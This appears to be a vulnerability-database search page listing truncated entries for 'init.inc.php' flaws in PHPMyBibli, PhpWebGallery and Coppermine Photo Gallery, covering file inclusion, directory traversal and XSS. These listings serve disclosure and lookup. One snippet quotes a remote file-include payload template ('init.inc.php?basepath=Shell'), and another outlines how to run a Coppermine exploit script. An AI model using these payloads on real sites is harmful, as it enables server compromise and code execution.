8 matches found
PHPMyBibli 1.32 Init.Inc.PHP Remote File Include Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/23599/info PHPMyBibli is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue may allow an attacker to compromise the application and the...
CVE-2008-4702
Multiple directory traversal vulnerabilities in PhpWebGallery 1.3.4 allow remote attackers to include and execute arbitrary local files via a .. dot dot in the 1 userlanguage and 2 usertemplate parameters to a init.inc.php, and b the userlanguage parameter to isadmin.inc.php...
Directory traversal
Multiple directory traversal vulnerabilities in PhpWebGallery 1.3.4 allow remote attackers to include and execute arbitrary local files via a .. dot dot in the 1 userlanguage and 2 usertemplate parameters to a init.inc.php, and b the userlanguage parameter to isadmin.inc.php...
Coppermine Photo Gallery 1.4.18 - Local File Inclusion Remote Code Execution
Coppermine Photo Gallery 1.4.18 - Local File Inclusion Remote Code Execution authenticate; ... 301. // Process language selection if present in URI or in user profile or try 302. // autodetection if default charset is utf-8 303. if !empty$GET'lang' 304. 305. $USER'lang' = ereg"^a-z0-9-$",...
cpg-lfiexec.txt
authenticate; ... 301. // Process language selection if present in URI or in user profile or try 302. // autodetection if default charset is utf-8 303. if !empty$GET'lang' 304. 305. $USER'lang' = ereg"^a-z0-9-$", $GET'lang' ? $GET'lang' : $CONFIG'lang'; 306. 307. 308. if isset$USER'lang' &&...
pmb-rfi.txt
PHPMyBibli [email protected] Homepage: http://www.MoHaNdKo.cOm Exploit:Path/includes/init.inc.php?basepath=Shell Greetz To: Tryag-Team & AsbMay's Group & Xp10 TeAm & CiTy GhOsTs TeAm Greetz To: mY Love Dr.hacker BiG seso...
cpg_143_incl_xpl
this works regardless of any php.ini settings, you need a normal user account with upload rights in personal albums and at least one album usage: launch from Apache, fill in requested fields, then go! Sun-Tzu: "The direct and the indirect lead on to each other in turn. It is like moving in a...
CVE-2005-1172
CVE-2005-1172 describes a cross-site scripting (XSS) vulnerability in Coppermine Photo Gallery 1.3.x, specifically in the file init.inc.php. The issue allows remote attackers to inject arbitrary web script or HTML via the X-Forwarded-For parameter. Multiple connected sources corroborate this as a...